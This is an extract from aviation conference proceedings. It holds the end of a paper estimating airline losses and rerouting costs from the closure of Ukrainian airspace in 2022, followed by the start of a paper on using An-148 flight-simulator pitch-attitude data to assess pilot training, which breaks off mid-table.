infrastructure and estimate total losses in air traffic for scheduled flights in Ukrainian airports, by operated airlines. Also, we provide analysis of trajectory modifications for transit flights through closed volumes.
2 Materials and Methods Ukrainian airspace consists of five flight information regions: L’viv, Kyiv, Dnipropetrovsk, Simferopol, and Odesa [9, 10]. Ground surveillance network includes 16 en-route and 11 terminal surveillance radars [11, 12]. A few multilateration systems have been used, including the UKBB airport. Navigational aids network consists of 9 single distance measuring equipment (DME) (KSN, KVR, BAH, RVN, TER, STB, UZH, VIN, YHT) and 8 high altitude collocated DME and VHF Omnidirectional Range (BRP, DNP, KVH, IVF, LIV, KHR, ODS, SLV) [9]. DME includes on-board interrogator and a ground network of transponders. During DME measuring cycle, the interrogator transmits a set of interrogations to the ground station. Reply signals from ground transponder automatically measure the distance between an airplane and the ground station. Measured distances may be used for holding constant trajectory during airplane operation in the vicinity of an airport. A pair of DME is used to detect airplane position during an en-route phase of flight. Nowadays, DME is used as a main stand-by positioning sensor on board airplanes. Ground network of navigational aids is represented in Fig. 1. Local navigational aids are a part of the global navigational aids network. Changes in configuration of local network will affect the global service volume of DME, decrease the amount of pairs for DME/DME navigation, and reduce the performance of on-board positioning system by pairs of navigational aids [13, 14]. As a result of military actions, most surveillance radars have been affected. Also, the infrastructure of areas where active military operations took place has been destroyed or damaged significantly. Ground infrastructure of airports of Chernihiv, Sumy, Kharkiv, Kherson, Mykolaiv, and Zaporizhzhia has been affected. Ground infrastructure plays an
Impact of Closed Ukrainian Airspace
53
Fig. 1. Ukrainian network of ground DME transponders
important role in radio equipment maintenance and repair [15–17]. Navigational aids of Kherson (KHR), Mariupol (MRP), and Bakhmach (BAH) are still in places of active military actions [18] and probably have been out of work due to significant damages. Changes in the configuration of navigational aids network have caused the decreasing in positioning performance of on-board equipment [19–21]. Also, the operation of various civil aviation services is under attack on the cybersecurity side [22, 23]. Closed airspace has a significant impact on the overall air traffic system. Russian military invasion into Ukraine affects operations in Flight Information Regions of Kyiv (UKBU and UKBV), Dnipropetrovsk (UKDV), Lviv (UKLV), Odesa (UKOV), Simferopol (UKFV), Chisinau (LUUU), Minsk (UMMV), Moscow (UUWV), and Rostovna-Donu (URRV) [8]. In addition, sanctions against Russia have made the whole Russian airspace closed for operation of many airlines. All closed airspaces are in contact each other. The configuration of total closed airspace creates a significant area to avoid entering. The geometry of closed airspace is presented in Fig. 2. The geometry of joined closed volume causes significant difficulties for polar flights from North America to Asia. Since all civil aviation flights performing passenger services are flights with mandatory use of controlled airspace, they are performed on preestablished routes or in free route airspace areas. Therefore, the closure of airspace has affected transit flights, which are now being reoriented to avoid passing through this volume. New trajectories increase the length of the route, which increases fuel consumption, carbon emissions, and ticket prices, as well for end-users. Also, direct connections between North Europe and Asian airports are affected too. In addition, many western Asian countries have their limitation to use some parts of airspace. As an example, the airspace of Afghanistan is still closed for entering at any altitudes. Such kind of limitations causes multiple difficulties in the trajectory planning phase. Safe trajectory of
54
O. Ivashchuk and I. Ostroumov
Fig. 2. The geometry of closed airspace
an airplane is a polygonal chain that is flexed to avoid entering the restricted airspace volumes, using the lowest distance as a main criterion of effectiveness. In the paper, we use statistical analysis of air traffic data to identify the losses of airlines operated in Ukraine caused by airspace closures and to measure the effect of replanning airplane trajectories for transit flights. We propose a cost accumulation method to estimate airline losses, which is based on statistical data processing of previously performed flights, estimation of scheduled traffic on a weekly basis, and making predictions of future flights. Prediction is grounded on a constant traffic flow based on scheduled flights. Total losses of each airline on a particular day of prediction are estimated as a cumulative function for each parameter separately by the following equation: n ln (p, a), (1) L(p, a) = i=1
where L(p,a) is total losses of the airline a in particular parameter p for n days of accumulation; n is a number of days for data analysis; ln (p,a) is the daily loss for n-th day of prediction.
Impact of Closed Ukrainian Airspace
55
3 Experiments In our study, we use a database of archived flights. The database includes airplane trajectories obtained under Automatic Dependent Surveillance-Broadcast (ADS-B) concept. According to ADS-B, each airspace user is required to use a specific transponder on board to share his position and identification information. A network of ground equipment receives all ADS-B reports which can be easily decoded and stored in a database [24, 25]. We use data recorded by ADS-B receiver located at National Aviation University (Kyiv) which mostly covered air traffic in the central part of Ukraine. Database of Ukrainian air navigation service provider is used to analyze air traffic within Ukrainian airspace. Also, we use a FlightAware database [26] to get air traffic data globally. From these three databases, we extract airplane identification numbers, date/time of take-off and landing, departure, and destination airports. Airplane identification code is in relation to flight number and the airline providing particular flight. A table with these data is used as input for air traffic data processing. Air traffic data for the last three months have been processed to detect scheduled flights from Ukrainian airports. All scheduled flights are repeated weekly and can be used to predict air traffic on a timetable basis. We identify most scheduled flights from the following Ukrainian airports: Boryspil (UKBB), Zhuliany (UKKK), Lviv (UKLL), Odesa (UKOO), Kharkiv (UKHH), Zaporizhzhia (UKDE), Dnipro (UKDD) and IvanoFrankivsk (UKLI). All these airports are international, so they can accept not only domestic but also international flights. There are dozens of destinations and hundreds of flights each week. Air traffic database includes unique 76 flight connections with destinations around the globe. Flight connections with Ukrainian airports in form of a directed graph are presented in Fig. 3. We use statistical data processing [27, 28] of available surveillance data of air traffic in Ukraine with the help of specially developed software in a Matlab environment. Developed software includes three main modules: data input, statistical data processing, and visualization. Data input module supports reading of data from a file with extensions “.xls” or “.xlsx”. Input file includes a table with the following columns: airline identification code, airplane type code, flight number, date of flight, length of performed trajectory in NM, time of flight, codes of departure, and destination airports. The user should select a file location with a particular table structure after software runs. The data input module reads a selected file and saves each column of input table in a separate variable. Rows of input table with format mistake are indicated in a text file for input data improvement. In the statistical data processing module, first of all, a timetable of scheduled and arrived airplanes is built based on a unique flight identification code. Losses by each airline are estimated in terms of total trajectory length, flight time, available seats, and available seat-kilometers. Results of statistical data processing are accumulated for each day of prediction. Obtained results are plotted in graphs of visualization module as cumulated functions distributions of each parameter by a different airline. Also, a network of airline connections based on input dataset is represented in form of a directed graph, which will help to identify the most loaded airport as the node with a higher degree.
56
O. Ivashchuk and I. Ostroumov
Fig. 3. Directed graph of flight connections with Ukrainian airports
Results of data analysis indicate that scheduled passenger flights have been performed by 28 different airlines operated in Ukrainian airports. We assume constant scheduled flights to make a prediction of air traffic distribution over the 63 days of airspace closed. We use the time frame from February 24 to April 27, 2022 for scheduled air traffic prediction.
4 Results Total losses in air traffic can be estimated by cumulative function of total trajectories length for the flights from Ukrainian airports by (1). Results of losses in total trajectory length are presented in Fig. 4. Total length losses reach 16 M km. Also, we analyze part of each airline in total length losses. Cumulated function of length losses for the top five operators is presented in Fig. 4. Ukraine International Airlines, the largest airline in the Ukrainian market, feels losses in total flight length at a level of 5.4 M km. Total flight length also characterizes losses of air navigation service providers that can’t be realized due to canceled flights. Each user of airspace should pay fixed taxes based on trajectory length. Therefore losses of each air navigation provider are identical to the total losses in trajectories length.
Impact of Closed Ukrainian Airspace
57
Fig. 4. Losses in total trajectory length by operated airlines
Taking into account available data of airplane types used on scheduled flights it is possible to estimate losses in available seats for each airline separately (Fig. 5).
Fig. 5. Losses in the number of available seats
The total number of seats lost during the studied period is just under 1.6 M seats. This parameter depends on both the size of the airline’s fleet and the regularity of flights. Therefore, the main share fell on the main providers. The available seat-kilometer (ASK) coefficient is also an important indicator for aviation market, which reflects the total passenger capacity of the company in kilometers. The results of ASK prediction in form of cumulated losses function are presented in Fig. 6. The total ASK losses are a little more than 3 B seat km.
58
O. Ivashchuk and I. Ostroumov
Also, we study the parameter of total flight time by each airline. Results of estimation of cumulated losses in total flight time by the airline are represented in Fig. 7. Total losses in flight time are reaching 4.7 M hours.
Fig. 6. Cumulated losses in ASK by airline
Fig. 7. Cumulated losses of total flight time
Impact of Closed Ukrainian Airspace
59
The top fifteen airlines affected by the closure of Ukrainian airspace are presented in Table 1. Based on traffic analysis, Wizz Air has the largest number of connections, however, their flights are not frequently scheduled. It makes Wizz Air in the seven’s place by ASK coefficient. The biggest losses have been detected for Ukraine International Airlines compared to other operators. Ukraine International Airlines has lost 106 M km seats for 63 days. Table 1. Top airlines affected by the closure of Ukrainian airspace No
Airline
Number of connections
Number of flights per week
Total flights length per week, K NM
Total seat number per week, K
ASK per week, M km seats
1
Wizz Air
95
159
196.70
28.10
34
2
Ukraine International Airlines
92
474
605.30
79.60
106.80
3
Ryanair
61
208
344
36.40
60.20
4
Sky Up Airlines
39
104
286.90
17.60
48.70
5
Wind Rose
36
132
75.50
10.80
8
6
Bees Airline
20
62
109.70
10.90
19.20
7
Turkish Airlines
20
135
157.20
38.20
43.70
8
Pegasus Airlines
16
75
91.60
13.20
16.10
9
Azur Air Ukraine
15
20
108.40
5.50
34
10
TAP Portugal 11
64
77.50
10.10
12.60
11
Air Baltic
8
35
40.30
5
5.80
12
Flydubai
8
44
172.60
9.20
36.20
13
LOT Polish Airlines
8
48
38.50
8
6.50
14
CSA Czech Airlines
6
30
36.90
4.60
5.70
15
Egypt Air
6
40
29.40
2.90
4.20
60
O. Ivashchuk and I. Ostroumov
Other losses are connected with changing flight trajectories from the most efficient for every transit flight through closed airspace. New trajectories have to avoid the usage of closed airspace volume and are characterized by a much longer trajectory length due to being placed in parallel to the closed airspace boundary line [29]. Based on the geometry of closed airspace, we can specify two main airflows that have been affected: Europe – Asia and North America – Asia connections. The results of flight trajectory analysis for the ten most affected flights are presented in Table 2. We compare efficient and new trajectories in total length and duration parameters. For example, flights from the Northern countries of Europe to Asia have significantly changed. Thus, FIN74 for connection RJAA to EFHK has to fly an additional 1,899 NM that increases flight time by 3 h 11 min. Many airlines operating in North-Atlantic regions have changed their trajectories to Pacific ones to support North America to Asia connections. Significant changes in trajectory length have caused additional fuel consumption that leads to an increase in tickets price for passengers. From an ecological side, an increase in fuel burn leads to a significant increase in carbon (CO2 ) emission in the atmosphere. Based on the simplest model of carbon emission prediction for civil aviation: each one kg of jet fuel burn results in 3.16 kg of CO2 emission [30]. Based on this simplest model, we can easily predict additional carbon emissions caused by airplane trajectory modification. The results of additional carbon emissions for particular flights are presented in Table 3. Table 2. Flight trajectory analysis for the ten most affected flights Flight number
Departure Destination Airplane airport, airport, type ICAO ICAO code code
Efficient trajectory length, NM
Efficient trajectory duration, HH:mm
New trajectory length, NM
New trajectory duration, HH:mm
FIN74
RJAA
EFHK
A359
5,014
9:29
6,913
12:40
FIN42
RKSI
EFHK
A359
4,589
9:02
6,637
13:56
KAL510 ESSA
RKSI
B748
4792
8:30
6,460
11:16
KAL908 EGLL
RKSI
B77w
5,698
10:08
6,675
13:08
JAL42
EGLL
RJTT
B789
6,220
10:53
7,759
15:33
UAL82
KEWR
VIDP
B789
7,600
14:34
8,242
15:03
KAL94
KIAD
RKSI
B789
7,294
13:56
7,799
15:27
SIA23
KJFK
WSSS
A359
10,488
17:15
10,730
18:55
EVA31
KJFK
RCTP
B77w
8,046
15:29
8,244
16:36
CPA829
CYYZ
VHHH
A350-1000 8,283
14:53
8,609
18:02
Impact of Closed Ukrainian Airspace
61
Table 3. Estimation of additional carbon emissions caused by airplane trajectories modifications Flight number
Number of seats
FIN74
315
Fuel burn, kg/km 7.07
FIN42
315
KAL510
405
7.07
KAL908
368
7.88
JAL42
294
UAL82
294
KAL94 SIA23
Additional length of trajectory, km
Average fuel burn per flight, ton
Average fuel burn per seat, kg
3516.95
24.8
78.9
Additional CO2 emission, ton
78.5
3792.90
26.8
85.1
84.7
3089.14
33.6
83.1
106.4
1809.40
14.2
38.7
45.0
5.85
2850.23
16.6
56.7
52.7
5.85
1188.98
6.9
23.6
21.9
294
5.85
935.26
5.8
18.6
17.3
315
7.07
448.18
3.1
10.0
10.0
EVA31
368
7.88
366.70
2.8
CPA829
369
7.07
603.75
4.3
10.9
7.85 11.5
9.13 13.5
5 Discussion The results of statistical analysis indicate that in 63 days total losses in trajectory length for scheduled traffic only reach 16 M km; about 1.6 M seats have not been provided, which results in total ASK losses at a level of 3 B seat km. The results of modeling total losses in flight time reach 4.7 M h. The results of modeling the cumulated losses distribution by airlines show seriously affected air transportation market. Airlines have lost a total of about 411 destinations, which are 1,630 flights each week. The results of cost analysis for selected transit flights over closed airspace indicate a significant increase in flight time due to using trajectories with avoiding entering the closed airspace. Also, it makes a dramatic influence on the total cost of a flight and causes additional carbon emissions in the atmosphere. Obtained results indicate that only one side flight of FIN74 generates 78.5 tons of additional CO2 emission. The increase in the length of flight connection is also associated with the increase in the fees connected with the usage of much longer particular airspaces and providing air navigation services much longer. These additional fees also affect the total ticket price for the end passenger. Significant changes in flight time require the use of additional crew for flights longer than 9 h due to perils of pilot work time [31] that also cause additional expenses for an airline.
6 Conclusions Russian military invasion into Ukraine has caused the closure of a big part of airspace with a size of about 18 million km2 . A cost analysis has been used to estimate the impact of closed Ukrainian airspace for operated airlines. The proposed cost accumulation
62
O. Ivashchuk and I. Ostroumov
method of airline losses estimates losses of each airline operated in Ukrainian airspace by parameters of total trajectory length, flight time, available seats, and available seatkilometer. Obtained distributions of losses by these parameters as cumulated functions indicate an impact of war on airlines operated in closed airspace. Unfortunately, proposed method operates with traffic on a scheduled basis only and does not consider charter flights which are mostly performed on a random basis. However, application of proposed method gives a main core of losses by each parameter due to most passenger and cargo traffic being scheduled. Therefore, missing charter flights is the main disadvantage of proposed method however it does not change obtained results significantly. Also, the geometry of closed airspace has been studied for the first time. Obtained results indicate an unsuccessful configuration of closed airspace for flight connections from Asia to Europe and North America. All trajectories for these flight connections have been re-planed. The results of the cost analysis indicate that the length of most of the replanned trajectories has increased due to requirements to avoid entering closed airspace. A simple comparison of the same connection, but for different trajectories indicates a significant increase in the length of the trajectory, for example, FIN42 reaches 3,792 km. That causes an additional 26 tons of fuel to be burned and provides an extra 84.7 tons of carbon emission only for one flight on one side. Also, it results in increased fees and total flight time for the end user. The air navigation infrastructure of Ukraine has been seriously damaged. It will require some period to fix all air navigation services that are necessary to support civil air traffic.
References 1. Annual Report 2019. The World of Air Transport in 2019. ICAO (2019). https://www.icao. int/annual-report-2019/Pages/the-world-of-air-transport-in-2019.aspx 2. Nizetic, S.: Impact of coronavirus (COVID-19) pandemic on air transport mobility, energy, and environment: a case study. Int. J. Energy Res. 44(13), 10953–10961 (2020) 3. Sun, X., Wandelt, S., Zheng, C., Zhang, A.: COVID-19 pandemic and air transportation: successfully navigating the paper hurricane. J. Air Transp. Manag. 94(1), 102062 (2021). https://doi.org/10.1016/j.jairtraman.2021.102062 4. Chu, A.M., Tiwari, A., So, M.K.: Detecting early signals of COVID-19 global pandemic from network density. J. Travel Med. 27(5), 1–3 (2020). https://doi.org/10.1093/jtm/taaa084 5. IATA annual review (2021). https://www.iata.org/en/publications/annual-review 6. Gudmundsson, S., Cattaneo, M., Redondi, R.: Forecasting recovery time in air transport markets in the presence of large economic shocks: COVID-19. SSRN, pp. 1–17 (2020). https://doi.org/10.2139/ssrn.3623040 7. Effects of Novel Coronavirus (COVID-19) on Civil Aviation: Economic Impact Analysis. Economic Development – Air Transport Bureau. ICAO Uniting Aviation (2022). https:// www.icao.int/sustainability/Pages/Economic-Impacts-of-COVID-19.aspx 8. Conflict Zone Information Bulletin. CZIB-2022-01R03, EASA (2022). https://www.easa.eur opa.eu/domains/air-operations/czibs/czib-2022-01r03 9. Aeronautical Information Publication (AIP) of Ukraine. Ukrainian State Air Traffic Services Enterprise (2019) 10. LSSIP 2021 – Ukraine Local Single Sky Implementation. Eurocontrol (2022)
Impact of Closed Ukrainian Airspace
63
11. Volosyuk, V., et al.: Optimal method for polarization selection of stationary objects against the background of the Earth’s surface. Int. J. Electron. Telecommun. 68(1), 83–89 (2022). https://doi.org/10.24425/ijet.2022.139852 12. Zhyla, S., et al.: Statistical synthesis of aerospace radars structure with optimal spatio-temporal signal processing, extended observation area and high spatial resolution. Radioelectron. Comput. Syst. 1, 178–194 (2022). https://doi.org/10.32620/reks.2022.1.14 13. Ostroumov, I.V., Marais, K., Kuzmenko, N.S.: Aircraft positioning using multiple distance measurements and spline prediction. Aviation 26(1), 1 (2022). https://doi.org/10.3846/avi ation.2022.16589 14. Ostroumov, I.V., Kuzmenko, N.S.: Configuration analysis of European navigational aids network. In: Integrated Communications Navigation and Surveillance Conference (ICNS), pp. 1–9 (2021). https://doi.org/10.1109/ICNS54818.2022.9771515 15. Solomentsev, O., Zaliskyi, M., Herasymenko, T., Kozhokhina, O., Petrova, Y.: Efficiency of operational data processing for radio electronic equipment. Aviation 23(3), 71–77 (2019). https://doi.org/10.3846/aviation.2019.11849 16. Solomentsev, O., Zaliskyi, M., Nemyrovets, Yu., Asanov, M.: Signal processing in case of radio equipment technical state deterioration. In: Signal Processing Symposium 2015 (SPS 2015), pp. 1–5 (2015). https://doi.org/10.1109/SPS.2015.7168312 17. Solomentsev, O., Zaliskyi, M.: Correlated failures analysis in navigation system. In: IEEE 5th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), pp. 41–44 (2018). https://doi.org/10.1109/MSNMC.2018.8576306 18. Russian attacks and troop locations. Ministry of Defense. United Kingdom. https://mobile.twi tter.com/DefenceHQ/status/1508774299058020357?cxt=HHwWioC92eWOn_ApAAAA 19. Ostroumov, I.V., Kuzmenko, N.S.: Accuracy assessment of aircraft positioning by multiple Radio Navigational aids. Telecommun. Radio Eng. 77(8), 705–715 (2018). https://doi.org/ 10.1615/TelecomRadEng.v77.i8.40 20. Ostroumov, I.V., Kuzmenko, N.S.: Accuracy improvement of VOR/VOR navigation with angle extrapolation by linear regression. Telecommun. Radio Eng. 78(15), 1399–1412 (2019). https://doi.org/10.1615/TelecomRadEng.v78.i15.90 21. Ruzhentsev, N., et al.: Radio-heat contrasts of UAVs and their weather variability at 12 GHz, 20 GHz, 34 GHz, and 94 GHz frequencies. ECTI Trans. Electr. Eng. Electron. Commun. 20(2), 1–9 (2022) 22. Gnatyuk, S.: Critical aviation information systems cybersecurity. In: Meeting Security Challenges through Data Analytics and Decision Support, NATO Science for Peace and Security Series - D: Information and Communication Security, vol. 47, no. 3, pp. 308–316. IOS Press Ebooks (2016) 23. Gnatyuk, S., Akhmetov, B., Kozlovskyi, V., Kinzeryavyy, V., Aleksander, M., Prysiazhnyi, D.: New secure block cipher for critical applications: design, implementation, speed and security analysis. In: Hu, Z., Petoukhov, S., He, M. (eds.) AIMEE 2019. AISC, vol. 1126, pp. 93–104. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-39162-1_9 24. Ostroumov, I.V., Kuzmenko, N.S.: Statistical analysis and flight route extraction from automatic dependent surveillance-broadcast data. In: Integrated Communications Navigation and Surveillance Conference (ICNS), pp. 1–9 (2022). https://doi.org/10.1109/ICNS54818.2022. 9771515 25. Sun, J., Ellerbroek, J., Hoekstra, J.: Flight extraction and phase identification for large automatic dependent surveillance–broadcast datasets. J. Aerosp. Inf. Syst. 14(10), 566–572 (2017) 26. FlightAware. https://flightaware.com 27. Zaliskyi, M., Petrova, Y., Asanov, M., Bekirov, E.: Statistical data processing during wind generators operation. Int. J. Electr. Electron. Eng. Telecommun. 8(1), 33–38 (2019). https:// doi.org/10.18178/ijeetc.8.1.33-38
64
O. Ivashchuk and I. Ostroumov
28. Solomentsev, O., et al.: Method of optimal threshold calculation in case of radio equipment maintenance. In: Shukla, S., Gao, X.Z., Kureethara, J.V., Mishra, D. (eds.) Data Science and Security. LNNS, vol. 462, pp. 69–79. Springer, Singapore (2022). https://doi.org/10.1007/ 978-981-19-2211-4_6 29. Havrylenko, O., et al.: Decision support system based on the ELECTRE method. In: Shukla, S., Gao, X.Z., Kureethara, J.V., Mishra, D. (eds.) Data Science and Security. LNNS, vol. 462, pp. 295–304. Springer, Singapore (2022). https://doi.org/10.1007/978-981-19-2211-4_26 30. Seymour, K., Held, M., Georges, G., Boulouchos, K.: Fuel estimation in air transportation: modeling global fuel consumption for commercial aviation. Transp. Res. Part D: Transp. Environ. 88, 102528 (2020) 31. EASA FTL Regulations Combined Document. UK Civil Aviation Authority (2014)
Analysis of Approach Attitude for the Evaluation of the Quality of Pilot Training Yurii Hryshchenko1(B) , Victor Romanenko1 , Maksym Zaliskyi1 , and Tetiana Fursenko2 1 National Aviation University, Kyiv, Ukraine
[email protected] 2 Kyiv National Economic University named after Vadym Hetman, Kyiv, Ukraine
Abstract. The paper concentrates on the ergatic aircraft control system. It examines the issue of assessing the quality of pilot training based on the analysis of changes in aircraft flight parameters. In particular, the authors’ focus is laid on approach attitude. The pitch attitude is treated as a random variable. The initial data for the research are obtained on the An-148 full flight simulator with and without failures. Relying on them, we find the laws of distribution of a random variable in flights without failures and with complex failures and conduct the analysis of the pitch attitude autospectra. Based on the obtained information, we assess the quality of pilot training. Besides, the authors synthesize an algorithm for detecting the presence of components indicating complex failures in pitch attitude trends. For a comparative assessment, the implementation of the algorithm is carried out on the basis of the Neyman-Pearson criterion, as well as the optimal Bayesian criterion. Keywords: Deterministic fluctuations · random process · quality of piloting technique · detector · human factor
1 Introduction Landing is the final and most difficult flight phase. This is due to the fact that at this time an aircraft crew has the most intensive workload and a flight is performed at low altitude and low speed. The aircraft landing process begins with performing a pre-landing maneuver – descent and entry into the aerodrome zone. It is carried out using radio aids. In the vicinity of the airdrome, a plane carries out several turn-around maneuvers and then descends until landing. After touchdown, the aircraft makes a brake roll until it comes to a complete stop. During the approach phase at an altitude of 300–400 m, the aircraft landing gear is lowered, then at an altitude of 150–200 m flaps are extended and the engine thrust is reduced. The aircraft descent is executed along the glide path to the go-around altitude (60 m). © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 65–79, 2023. https://doi.org/10.1007/978-3-031-35467-0_5
66
Y. Hryshchenko et al.
The horizontal projection of the aircraft landing path from the height of the conditional obstacle (15 m) to a complete stop is called the landing distance. The landing distance consists of the following stages: descent (gliding), flare, holding-off, landing (touchdown) and the after-landing roll to a complete stop. At the gliding stage, an aircraft descends at a vertical speed of 5–8 m/s. At the flare stage, the aircraft is moved from an angular position to a horizontal one. At the same time, the angle of attack and the lift coefficient are increasing while the speed is being reduced. The flare ends at an altitude of 0.5–1 m. At the end of the flare, the aircraft still has a sufficiently high airspeed, at which landing is difficult and dangerous. Holing-off is performed to reduce the speed. At this stage, under the action of the drag force, the aircraft is decelerated. As the speed decreases, to maintain the altitude, the angle of attack is increased to its landing value. At a certain speed rate, the lift force no longer holds the weight of the aircraft, and it touches the ground. Thus, the flight execution at the landing stage demands from pilots a certain skill and a coherent interaction.
2 Materials and Methods 2.1 Analysis of Flight Simulators Aviation simulators are widely used in modern civil and military aviation. The aims of simulators are pilots training, maintaining and improving their qualification level. Flight simulation can also be utilized to train maintenance engineers and during the design of aircraft and its systems. The aviation simulator imitates the flight of the aircraft. The dynamics of the flight is simulated based on special mathematical models, according to which the aircraft flies. The simulator takes into account the behavior during the movement of the control elements and when the aircraft is affected by external influences, such as the density and turbulence of the air, the presence of clouds and precipitation. In addition, the operation of all systems of a specific aircraft model is also simulated. Depending on the purpose of the flight simulator, different degrees of complexity for flight simulation are considered. This requires appropriate hardware and detail models with varying degrees of realism. In the simplest version, a desktop computer with simulated aircraft systems can be considered as the flight simulator [1]. The most complex flight simulators are Full Flight Simulators (FFS). The FFS is a cockpit with working controls and instruments and other cabin devices that allow complex simulations in combination with visual systems with a wide field of view. As a rule, such cockpits are installed on a moved system with six degrees of freedom in order to effectively respond to each external influence and to each movement of the pilot during flight simulation [2]. Consider the main types of flight simulators. 1. Cockpit Procedures Trainer (CPT) is used to practice actions in emergency situations or to study the arrangement of the cockpit. 2. Aviation Training Device (ATD) is used for basic flight training.
Analysis of Approach Attitude for the Evaluation
67
3. The Basic Instrument Training Device (BITD) is used to practice general flight procedures. 4. Flight and Navigation Procedures Trainer (FNPT) is used for general flight training. 5. Flight Training Device (FTD) is used for both general and special flight training. 6. Complex Simulator (Full Flight Simulator) is used for training on aircraft of a specific type, in accordance with the rules of the International Civil Aviation Organization (ICAO) [3]. The complex simulator of the An-148 aircraft has a first-class visualization system and a mobile cabin. The equipment can simulate any conditions of aircraft operation, including emergency situations, for example failure of one or another system or control and landing in difficult weather conditions. The FFS of the An-148 is intended for training the crew in ground conditions and obtaining the practical skills: a) in piloting and aircraft control, b) in operation of functional systems of the aircraft, c) in actions both in normal flight conditions and in case of failures of functional systems and in other special cases of flight, d) according to the rational distribution of duties relations and interaction of crew, maintaining communication between crew. The flight simulator provides solving the following tasks: 1) pre-flight training in the crew cabin (including checks of all functional systems, startup and testing of the auxiliary power system and engines using airfield and on-board power sources, work of each crew member in accordance with the control checks map); 2) starting and taxiing on runway, checking the performance of braking devices, practicing preliminary and executive start with visual orientation; 3) take-off with visual orientation, including in conditions of ICAO category 1; 4) instrument altitude gain to maximum horizontal flight altitude; 5) flight along the route using on-board radio equipment in automatic and manual flight control modes; 6) descent from echelon height to circle height with and without the use of an autopilot, including emergency descent; 7) approach to landing (using rudder or automatic control), departure to the second circle and landing, both by instruments and with visual orientation, including in the conditions of ICAO category 1 for landing minimums; 8) take-off and run-up in the wind conditions from any direction, braking with and without thrust reverser, taxiing with ±180° turns along the runway; 9) actions in the event of failure of the functional systems of the aircraft, dangerous external influences and in other special cases of flight, provided for by the Instructions for flights and the Manual for the technical operation of the aircraft. Parametric flight information can be written to external media for further processing. The goal of this paper is to improve the quality of the aircraft ergatic control system at the glide path entrance. The analysis of the airplane-handling style according to
68
Y. Hryshchenko et al.
flight parameters on the full flight simulator with the turned-off environmental influence shows that each pilot has his individual style. Random functions of the changing flight parameters of roll and pitch in flight can be identified as the ones peculiar to a particular pilot. The presence of the deterministic component indicates the breakage of the airplanehandling style when a pilot is exposed to negative factors. Therefore, its identification is very important. In case of approach with an engaged autothrottle, these are the main analog parameters for controlling an aircraft in the director mode. As it has been found in previous studies on the An-148 full flight simulator, without failures or a single event upset, the statistical distribution of such an important parameter as the bank angle does not contradict the normal distribution law [4]. In case of more than two serious failures occurring simultaneously, the statistical distribution of the bank angle does not contradict the generalized Weibull distribution. In such “flights” the quality of the piloting technique deteriorates. The level of the pilot’s psychophysiological tension increases. Cases, when flight parameters exceed the acceptable values, are more frequent. These standards are established in the flight manual for an aircraft of this type. The two considered algorithms based on the Neyman-Pearson and the optimal Bayesian criteria make it possible to declare the presence of a deterministic sinusoidal component in the given “flight” on the full flight simulator by the bank angle. Now it is necessary to check the presence of a deterministic component in simple and complex flights by the pitch attitude. It should be pointed that the problem of human factor is considered by many authors, and ICAO circulars pay attention to this problem [5–16]. At the modern stage of aviation branch development, the percentage of aviation accidents attributable to the human factor is 80–90%. Despite the fact, that such events have very small level of probability, the problem of preparing personnel for special flight situations cannot be ignored. Taking into account all erroneous actions of aviation personnel is an important process while achieving a high level of aviation safety. The elimination of erroneous actions of aviation personnel can be carried out in many ways and methods. One of them is a method of training operators to counteract a large load of factors during anti-stress training in order to improve their psychophysical qualities. Accounting the psychophysiological properties of a person in the training of operators is one of the most important factors while improving aviation safety, reliability and labor efficiency, and reducing the number of aviation accidents. The operator tending to the informational boundaries with increased psychophysiological tension leads to an increase in the amplitudes of the aircraft’s flight parameters. The change in the piloting style, which is monitored according to the flight parameters, subsequently leads to a multiple increase in such parameter as approach attitude. This can result in loss of aircraft lift force or unacceptable airspeed. The person without active counteraction to negative factors (on FFS, failures introduced by the operator) immediately loses concentration and makes mistakes. The suddenness of the occurrence of such information boundaries, leading to enormous risk and uncertainty, is what causes pilots to an aviation event if pilots are not
Analysis of Approach Attitude for the Evaluation
69
trained for such countermeasures. At the same time, every operator has his own informational limit, which depends on training, his psychophysiological qualities. Pushing this limit and expanding the capabilities of the operator is the main task facing the preparation for the FFS. The instructor staff should be provided with information on the presence of a deterministic component of the flight parameter in the form of comparative coefficients for flights without failure and with failures according to the Neyman-Pearson and Bayes criteria. While working on the FFS, it is necessary to include in the data processing system the synthesis of two algorithms for detecting the fact of increased psychophysiological tension of the pilot in the event of complex failures. Such procedure can be implemented by extracting a deterministic component from the random process of changing the flight parameter to evaluate the characteristics of the ergatic aircraft control systems. In addition, it is necessary to have a database of crew training according to the method presented above and respond in a timely manner to the deterioration in the quality of piloting technique. In a real flight, it is also advisable to have such a warning system about the deterioration in the quality of piloting technique. However, this requires a lot of time and coordination of this procedure with a large number of aviation services. 2.2 Methods for Detecting Complex Failures High pitch attitudes related to the pilot’s psychophysiological state affect the quality of flight in the horizontal plane. Let’s analyze the quality of flight in the horizontal plane by the pitch in real flight from the end of the turn on downwind leg (excluding turns) to landing (Table 1, Fig. 1). Table 1 contains the following notations: i is the measurement number, ϑi is the result of the i-th measurement. The analysis of autocorrelation functions and their spectra indicates a good quality of the piloting technique in real flight [17, 18]. Table 1. Initial data i
Angle, ϑi
i
Angle, ϑi
i
Angle, ϑi
i
Angle, ϑi
i
Angle, ϑi
1
3
11
1.5
21
3.5
31
4
41
3
2
−6
12
−1
22
5
32
6
42
−5
3
3.5
13
2.5
23
0
33
0
43
1
4
−1
14
6
24
4.6
34
−1
44
0
5
4.5
15
11
25
2.2
35
4
45
−1
6
0
16
14
26
4.7
36
4
46
−3
7
3
17
3.5
27
−0.5
37
6
47
−4 (continued)
70
Y. Hryshchenko et al. Table 1. (continued)
i
Angle, ϑi
i
Angle, ϑi
i
Angle, ϑi
i
Angle, ϑi
i
Angle, ϑi
8
−9
18
7.5
28
2.5
38
7.5
48
5
9
2
19
3.4
29
0.2
39
0
49
4
10
−2.5
20
5.2
30
−1
40
8
50
−2
We will construct the histogram of approach attitude distribution on final approach after the turn on downwind leg to landing and choose the corresponding predicted distribution (Fig. 2). As can be seen from the performed calculations in Fig. 2, the statistical data on the measurement do not contradict the hypothesis about their normal distribution with a confidence coefficient of 0.7. We will now analyze flights with complex failures n ≥ 3. In this case, there are failures of the second (right) engine and the second and fourth channels of the fly-by-wire controls (FBWCs), as well as the loss of control of the right aileron. To simplify the selection of the predicted distribution, we change the signs of the pitch attitude amplitudes. The analyzed data are shown in Table 2 and Fig. 3. Table 2. Initial data i
Angle, ϑi
i
Angle, ϑi
i
